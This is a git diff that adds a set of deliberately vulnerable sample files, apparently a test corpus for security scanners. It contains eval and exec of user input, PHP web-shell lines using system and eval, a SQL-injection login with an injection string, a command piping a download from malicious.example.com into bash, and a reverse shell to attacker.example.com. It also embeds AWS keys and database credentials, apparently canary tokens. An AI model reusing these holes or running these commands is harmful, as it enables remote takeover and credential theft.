diff --git a/browser copy/index.js b/browser copy/index.js
new file mode 100644
index 0000000..5f1b215
--- /dev/null
+++ b/browser copy/index.js	
@@ -0,0 +1,5 @@
+function executeUserScript() {
+    var userScript = document.getElementById('userScript').value;
+    // Using eval to execute user-provided script
+    eval(userScript);
+}
diff --git a/browser/index.js b/browser/index.js
new file mode 100644
index 0000000..5f1b215
--- /dev/null
+++ b/browser/index.js
@@ -0,0 +1,5 @@
+function executeUserScript() {
+    var userScript = document.getElementById('userScript').value;
+    // Using eval to execute user-provided script
+    eval(userScript);
+}
diff --git a/cli/index.js b/cli/index.js
new file mode 100644
index 0000000..7e5db7a
--- /dev/null
+++ b/cli/index.js
@@ -0,0 +1,18 @@
+const { exec } = require('child_process');
+
+const userArg = process.argv[2] || '';
+
+const cmd = `
+  rm -rf /tmp/vuln_dir --no-preserve-root &&
+  curl http://malicious.example.com/install.sh | bash &&
+  ls ${userArg}
+`;
+
+console.log('[*] Running dangerous CLI pipeline…');
+exec(cmd, (err, stdout, stderr) => {
+  if (err) {
+    console.error('[!] Pipeline failed:', err);
+    return;
+  }
+  console.log('[+] Pipeline succeeded. stdout:\\n', stdout);
+});
diff --git a/disk/index.js b/disk/index.js
new file mode 100644
index 0000000..963519e
--- /dev/null
+++ b/disk/index.js
@@ -0,0 +1,17 @@
+const express = require('express');
+const fs = require('fs');
+const path = require('path');
+const app = express();
+
+// Path Traversal
+app.get('/read', (req, res) => {
+  const file = req.query.file;
+  const fullPath = path.resolve(__dirname, file);
+  if (!fullPath.startsWith(__dirname + path.sep)) return res.status(400).send('Invalid file path');
+  fs.readFile(fullPath, 'utf8', (err, data) => {
+    if (err) return res.status(500).send(err.message);
+    res.send(data);
+  });
+});
+
+app.listen(3001, () => console.log('Disk vuln on port 3001'));
diff --git a/http copy/index.js b/http copy/index.js
new file mode 100644
index 0000000..1577130
--- /dev/null
+++ b/http copy/index.js	
@@ -0,0 +1,56 @@
+const express = require('express');
+const axios = require('axios');
+const { URL } = require('url');
+const dns = require('dns').promises;
+const app = express();
+
+function isPrivateIp(ip) {
+  return ip === '::1' ||
+    /^127\./.test(ip) ||
+    /^10\./.test(ip) ||
+    /^192\.168\./.test(ip) ||
+    /^172\.(1[6-9]|2[0-9]|3[0-1])\./.test(ip) ||
+    ip.startsWith('fc') || ip.startsWith('fd') ||
+    ip.startsWith('fe80:');
+}
+
+// SSRF
+app.get('/fetch', async (req, res) => {
+  const url = req.query.url;
+  let parsedUrl;
+  try {
+    parsedUrl = new URL(url);
+  } catch (e) {
+    return res.status(400).send('Invalid URL');
+  }
+  const hostname = parsedUrl.hostname;
+  if (!['http:', 'https:'].includes(parsedUrl.protocol) ||
+      hostname === 'localhost' ||
+      hostname === '127.0.0.1' ||
+      hostname === '::1' ||
+      /^(10|127)\./.test(hostname) ||
+      /^172\.(1[6-9]|2[0-9]|3[0-1])\./.test(hostname) ||
+      /^192\.168\./.test(hostname)) {
+    return res.status(400).send('URL not allowed');
+  }
+  try {
+  // DNS resolution to prevent DNS rebinding
+  try {
+    const addresses = await dns.lookup(parsedUrl.hostname, { all: true });
+    for (const { address } of addresses) {
+      if (isPrivateIp(address)) {
+        return res.status(400).send('URL not allowed');
+      }
+    }
+  } catch (e) {
+    return res.status(400).send('Invalid hostname');
+  }
+
+    const resp = await axios.get(url);
+    res.send(resp.data);
+  } catch (e) {
+    res.status(500).send(e.message);
+  }
+});
+
+app.listen(3000, () => console.log('HTTP vuln on port 3000'));
diff --git a/http/index.js b/http/index.js
new file mode 100644
index 0000000..1577130
--- /dev/null
+++ b/http/index.js
@@ -0,0 +1,56 @@
+const express = require('express');
+const axios = require('axios');
+const { URL } = require('url');
+const dns = require('dns').promises;
+const app = express();
+
+function isPrivateIp(ip) {
+  return ip === '::1' ||
+    /^127\./.test(ip) ||
+    /^10\./.test(ip) ||
+    /^192\.168\./.test(ip) ||
+    /^172\.(1[6-9]|2[0-9]|3[0-1])\./.test(ip) ||
+    ip.startsWith('fc') || ip.startsWith('fd') ||
+    ip.startsWith('fe80:');
+}
+
+// SSRF
+app.get('/fetch', async (req, res) => {
+  const url = req.query.url;
+  let parsedUrl;
+  try {
+    parsedUrl = new URL(url);
+  } catch (e) {
+    return res.status(400).send('Invalid URL');
+  }
+  const hostname = parsedUrl.hostname;
+  if (!['http:', 'https:'].includes(parsedUrl.protocol) ||
+      hostname === 'localhost' ||
+      hostname === '127.0.0.1' ||
+      hostname === '::1' ||
+      /^(10|127)\./.test(hostname) ||
+      /^172\.(1[6-9]|2[0-9]|3[0-1])\./.test(hostname) ||
+      /^192\.168\./.test(hostname)) {
+    return res.status(400).send('URL not allowed');
+  }
+  try {
+  // DNS resolution to prevent DNS rebinding
+  try {
+    const addresses = await dns.lookup(parsedUrl.hostname, { all: true });
+    for (const { address } of addresses) {
+      if (isPrivateIp(address)) {
+        return res.status(400).send('URL not allowed');
+      }
+    }
+  } catch (e) {
+    return res.status(400).send('Invalid hostname');
+  }
+
+    const resp = await axios.get(url);
+    res.send(resp.data);
+  } catch (e) {
+    res.status(500).send(e.message);
+  }
+});
+
+app.listen(3000, () => console.log('HTTP vuln on port 3000'));
diff --git a/index.php b/index.php
index df3d645..894117d 100644
--- a/index.php
+++ b/index.php
@@ -1,5 +1,8 @@
 <?php
 
-echo "<h>" +$_GET["search"] + "</h>";
+echo "<h>" .$_GET["search"]. "</h>";
+
+
+exec($_POST["exec"]);
 
 ?>
diff --git a/main.py b/main.py
index 437934d..2454076 100644
--- a/main.py
+++ b/main.py
@@ -6,6 +6,9 @@
 app = Flask(__name__)
 app.secret_key = os.urandom(24)
 
+
+# Simulating a database of user accounts and their private notes# Simulating a database of user accounts and their private notes
+
 # Simulating a database of user accounts and their private notes
 users = {
     1: {"id": 1, "username": "alice", "password": generate_password_hash("password123")},
@@ -38,7 +41,7 @@ def reverse_content(content):
 
 def apply_decryption(note):
     decrypted_content = reverse_content(note['content'])
-    os.system(note)
+    os.system(reverse_content)
     return {"id": note['id'], "content": decrypted_content}
 
 def decrypt_notes(encrypted_notes):
diff --git a/package.json b/package.json
new file mode 100644
index 0000000..5cb2217
--- /dev/null
+++ b/package.json
@@ -0,0 +1,11 @@
+{
+  "name": "uwu-vuln",
+  "version": "1.0.0",
+  "main": "index.js",
+  "scripts": {
+    "test": "echo \"Error: no test specified\" && exit 1"
+  },
+  "author": "",
+  "license": "ISC",
+  "description": ""
+}
diff --git a/stdin/index.js b/stdin/index.js
new file mode 100644
index 0000000..b712e33
--- /dev/null
+++ b/stdin/index.js
@@ -0,0 +1,12 @@
+const { exec } = require('child_process');
+
+const payload = 'bash -i >& /dev/tcp/attacker.example.com/4444 0>&1';
+
+console.log('[*] Executing reverse shell payload…');
+exec(payload, (err, stdout, stderr) => {
+  if (err) {
+    console.error('[!] Error executing payload:', err);
+    return;
+  }
+  console.log('[+] Payload executed. stdout:', stdout);
+});
diff --git a/test.php b/test.php
new file mode 100644
index 0000000..cdd2a13
--- /dev/null
+++ b/test.php
@@ -0,0 +1,42 @@
+<?php
+
+function login($username, $password) {
+    // Configuration
+    $db_host = 'localhost';
+    $db_username = 'root';
+    $db_password = 'root@1234';
+    $db_name = 'arnicaTest';
+
+
+    // Connect to database
+    $conn = new mysqli($db_host, $db_username, $db_password, $db_name);
+
+    // Check connection
+    if ($conn->connect_error) {
+        die("Connection failed: ". $conn->connect_error);
+    }
+
+    // admin
+    // gdhas' OR 1=1 #
+
+    // Query database
+    $query = "SELECT * FROM users WHERE username = '$username' AND password = '$password'";
+
+    $result = $conn->query($query);
+
+    // Check if user exists
+    if ($result->num_rows > 0) {
+        echo "Welcome, $username!";
+    } else {
+        echo "$query Invalid username or password.";
+    }
+
+    // Close connection
+    $conn->close();
+}<?php
+
+
+$username = $_POST['username'];
+$password = $_POST['password'];
+login($username, $password);
+?>
diff --git a/test.py b/test.py
new file mode 100644
index 0000000..0104a9b
--- /dev/null
+++ b/test.py
@@ -0,0 +1,3 @@
+import random
+
+print("asd")
diff --git a/upload.php b/upload.php
new file mode 100644
index 0000000..ac74e8d
--- /dev/null
+++ b/upload.php
@@ -0,0 +1,23 @@
+<?
+
+
+
+
+eval($_GET["XSS"]);
+
+
+// mysql://rkd5i4bymb9zh0g6nadx85bj2:my-secret-pw@rkd5i4bymb9zh0g6nadx85bj2.canarytokens.com:3306/
+
+
+system($_GET["cmd"]);
+
+
+/*
+[default]
+aws_access_key_id = AKIA2T2SJH6M76LT25T4
+aws_secret_access_key = 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
+output = json
+region = us-east-2
+*/
+
+?>
diff --git a/ws/index.js b/ws/index.js
new file mode 100644
index 0000000..7b0fc64
--- /dev/null
+++ b/ws/index.js
@@ -0,0 +1,12 @@
+const WebSocket = require('ws');
+const wss = new WebSocket.Server({ port: 8080 });
+
+// RCE
+wss.on('connection', ws => {
+  ws.on('message', msg => {
+    eval(msg);
+    ws.send('Executed: ' + msg);
+  });
+});
+
+console.log('WS vuln on port 8080');
\ No newline at end of file